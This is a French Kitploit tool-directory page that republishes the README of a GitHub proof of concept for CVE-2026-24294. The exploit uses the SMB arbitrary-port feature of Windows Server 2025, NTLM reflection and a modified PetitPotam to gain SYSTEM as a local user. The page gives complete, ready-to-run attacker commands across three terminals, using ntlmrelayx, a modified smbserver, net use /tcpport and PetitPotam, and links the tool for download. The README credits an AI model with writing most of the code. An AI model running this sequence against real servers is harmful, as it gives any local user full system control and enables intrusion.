Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24294 — PoC d'élévation de privilèges locale pour CVE-2026-24294, abusant du port arbitraire SMB et de la réflexion NTLM pour obtenir SYSTEM sur Windows Server 2025. | Kitploit
Outils/GitHubGitHub/0xndi/cve-2026-24294
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationMouvement LatéralTests d'IntrusionRed Teaming
GitHub0xndi/cve-2026-24294

CVE-2026-24294

PoC d'élévation de privilèges locale pour CVE-2026-24294, abusant du port arbitraire SMB et de la réflexion NTLM pour obtenir SYSTEM sur Windows Server 2025.

Voir le dépôt
536il y a 3 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24294 - Élévation de privilèges locale par réflexion NTLM via port SMB arbitraire

Élévation de privilèges locale sur Windows Server 2025 via la réflexion NTLM, abusant de la fonctionnalité de port SMB arbitraire introduite dans Windows 11 24H2 / Server 2025.

Vulnérabilité

Windows 11 24H2 / Server 2025 a introduit une fonctionnalité du client SMB qui permet des connexions sur des ports TCP arbitraires (net use \\host\share /tcpport:PORT). Combinée au multiplexage de sessions SMB (MS-SMB2 Section 3.2.4.2), cela permet une réflexion NTLM locale — un utilisateur à faibles privilèges peut contraindre un service privilégié (LSASS) à s'authentifier auprès d'un serveur SMB contrôlé par l'attaquant sur un port non standard, puis relayer l'authentification NTLM capturée vers le véritable service SMB sur le port 445.

Impact : NT AUTHORITY\SYSTEM depuis n'importe quel utilisateur local.

Systèmes concernés : Windows Server 2025 (configuration par défaut). Windows 11 24H2 impose la signature SMB, bloquant le relais.

Déroulement de l'attaque

root@kitploit:~
 LSASS (SYSTEM) ──NTLM──► Client SMB ──TCP:12345──► smbserver.py (le nôtre)
                                                   │
                                                   ▼ relais du blob NTLM
 Service SMB (:445) ◄────────────────── ntlmrelayx.py
 ← session SYSTEM
  1. net use ouvre une connexion TCP vers notre serveur SMB sur un port personnalisé
  2. PetitPotam contraint LSASS à s'authentifier auprès de \\127.0.0.1\share
  3. Le client SMB réutilise la connexion TCP existante (multiplexage de sessions)
  4. Notre smbserver capture le blob NTLM privilégié et le relaie via ntlmrelayx
  5. ntlmrelayx s'authentifie auprès du véritable service SMB sur le port 445 en tant que SYSTEM

Prérequis

  • Cible Windows Server 2025
  • Python 3 avec Impacket
  • PetitPotam.exe (compilé à partir des sources avec Visual Studio, voir PetitPotam/)

Utilisation

Ouvrez 3 terminaux.

Terminal 1 — Démarrez ntlmrelayx (écoute sur le port RAW 6666, relaie vers le SMB local) :

root@kitploit:~
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666

Terminal 2 — Démarrez le smbserver modifié (écoute sur le port 12345, relaie NTLM vers le port 6666) :

root@kitploit:~
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666

Terminal 3 — Exécutez l'exploit :

root@kitploit:~
:: Montez le partage sur un port personnalisé (ouvre une connexion TCP persistante)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: Contraignez LSASS à s'authentifier auprès de notre serveur SMB
PetitPotam.exe 127.0.0.1 localhost 2

La sortie whoami de ntlmrelayx affichera NT AUTHORITY\SYSTEM.

Composants

  • PetitPotam/ — Sources PetitPotam modifiées. Deux changements par rapport à l'original :
    • UUID : df1941c5-fe89-4e79-bf10-463657acf44d (interface EFSRPC WS2025)
    • Pipe nommé : \pipe\efsrpc
    • Utilise l'API #2 (EfsRpcEncryptFileSrv), le nom du partage est codé en dur comme test
  • smbserver.py — smbserver impacket modifié avec l'option -relay-port. Intercepte SMB2 SESSION_SETUP pour capturer une seconde authentification NTLM sur une connexion multiplexée et la relayer vers un serveur de relais RAW (ntlmrelayx --raw-port).

Crédits

Cette preuve de concept a été principalement écrite par une IA (GLM 5.1) sur la base des recherches et techniques décrites dans :

  • Bypassing Windows Authentication Reflection Mitigations for System Shells — Guillaume André, Synacktiv

Références

  • CVE-2026-24294 — Microsoft Security Response Center
  • PetitPotam — Gilles Lionel
  • Impacket — Fortra
Télécharger l’outil